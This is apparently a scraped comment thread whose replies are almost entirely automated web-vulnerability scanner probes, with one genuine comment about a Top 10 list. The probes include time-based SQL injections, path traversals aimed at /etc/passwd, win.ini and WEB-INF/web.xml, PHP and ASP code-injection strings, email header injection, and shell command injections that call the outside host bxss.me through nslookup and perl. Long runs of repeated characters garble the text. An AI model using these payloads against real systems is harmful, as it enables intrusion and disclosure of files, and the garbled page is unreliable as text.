http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
".gethostbyname(lc("hityw"."cnvhahuzbe2a6.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(82).chr(98).chr(77)."
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
/etc/shells
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
bxss.me
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(117).concat(88).concat(117).concat(67)+(require"socket"
Socket.gethostbyname("hitvz"+"givkokmv632bb.bxss.me.")[3].to_s)+"
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(105).concat(83).concat(107).concat(69)+(require'socket'
Socket.gethostbyname('hitqy'+'nqwvelsz475cc.bxss.me.')[3].to_s)+'
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
'"
re: Leo Saito
<!--
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+714-714-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+714-714-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+622-622-1=0+0+0+1
re: Leo Saito
-1 OR 3+622-622-1=0+0+0+1
re: Leo Saito
-1' OR 2+379-379-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+379-379-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+964-964-1=0+0+0+1 or '5iO7UCIA'='
re: Leo Saito
-1' OR 3+964-964-1=0+0+0+1 or '5iO7UCIA'='
re: Leo Saito
-1" OR 2+358-358-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+358-358-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
5pxMGRel'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 160=(SELECT 160 FROM PG_SLEEP(15))--
re: Leo Saito
ieQhSpFd' OR 29=(SELECT 29 FROM PG_SLEEP(15))--
re: Leo Saito
KCxdm17S') OR 781=(SELECT 781 FROM PG_SLEEP(15))--
re: Leo Saito
TNpyC1Yl')) OR 742=(SELECT 742 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@xxWb7
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
1
Hi Saito-san. Curious where it would Banbu would slot in your Top 10 list?
re: Eric Yu
hRFDK6NN
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+427-427-1=0+0+0+1
re: Eric Yu
-1 OR 3+427-427-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
L5MTFwoY'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 892=(SELECT 892 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 234=(SELECT 234 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 567=(SELECT 567 FROM PG_SLEEP(15))--
re: Eric Yu
NrKe5Zeb' OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: Eric Yu
rOgiKGjZ') OR 311=(SELECT 311 FROM PG_SLEEP(15))--
re: Eric Yu
W93B7MLR')) OR 831=(SELECT 831 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@GfgQR
re: Eric Yu
zgdoz3DP
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+425-425-1=0+0+0+1
re: Eric Yu
-1 OR 3+425-425-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
M0suoh8h'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 933=(SELECT 933 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 284=(SELECT 284 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 673=(SELECT 673 FROM PG_SLEEP(15))--
re: Eric Yu
YBdexiH1' OR 962=(SELECT 962 FROM PG_SLEEP(15))--
re: Eric Yu
ipKWUFaw') OR 342=(SELECT 342 FROM PG_SLEEP(15))--
re: Eric Yu
kVrsC05B')) OR 33=(SELECT 33 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@NOnPq
re: Eric Yu
1ClZX4kiO
re: Eric Yu
response.write(9431207*9569875)
re: Eric Yu
'+response.write(9431207*9569875)+'
re: Eric Yu
"+response.write(9431207*9569875)+"
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
echo kwjxqs$()\ twtayi\nz^xyu||a #' &echo kwjxqs$()\ twtayi\nz^xyu||a #|" &echo kwjxqs$()\ twtayi\nz^xyu||a #
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
&echo uooyjl$()\ evgetq\nz^xyu||a #' &echo uooyjl$()\ evgetq\nz^xyu||a #|" &echo uooyjl$()\ evgetq\nz^xyu||a #
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
|echo kfxbhe$()\ quosmu\nz^xyu||a #' |echo kfxbhe$()\ quosmu\nz^xyu||a #|" |echo kfxbhe$()\ quosmu\nz^xyu||a #
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
(nslookup hitkcnctgkfybfaea4.bxss.me||perl -e "gethostbyname('hitkcnctgkfybfaea4.bxss.me')")
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
$(nslookup hitnscagthbzrd65da.bxss.me||perl -e "gethostbyname('hitnscagthbzrd65da.bxss.me')")
re: Eric Yu
/etc/passwd
re: Eric Yu
&nslookup hittdycihctdjb1f5b.bxss.me&'\"`0&nslookup hittdycihctdjb1f5b.bxss.me&`'
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
&(nslookup hitoytzwzhssl665d6.bxss.me||perl -e "gethostbyname('hitoytzwzhssl665d6.bxss.me')")&'\"`0&(nslookup hitoytzwzhssl665d6.bxss.me||perl -e "gethostbyname('hitoytzwzhssl665d6.bxss.me')")&`'
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
|(nslookup hitaexulqjimn6c549.bxss.me||perl -e "gethostbyname('hitaexulqjimn6c549.bxss.me')")
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
`(nslookup hitwailoceleoa82c7.bxss.me||perl -e "gethostbyname('hitwailoceleoa82c7.bxss.me')")`
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
;(nslookup hitiwfnbmkflt9a906.bxss.me||perl -e "gethostbyname('hitiwfnbmkflt9a906.bxss.me')")|(nslookup hitiwfnbmkflt9a906.bxss.me||perl -e "gethostbyname('hitiwfnbmkflt9a906.bxss.me')")&(nslookup hitiwfnbmkflt9a906.bxss.me||perl -e "gethostbyname('hitiwfnbmkflt9a906.bxss.me')")
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
file:///etc/passwd
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
%0abcc:074625.67-10205.67.dcaaf.19990.2@bxss.me
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10206.67.dcaaf.19990.2@bxss.me
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.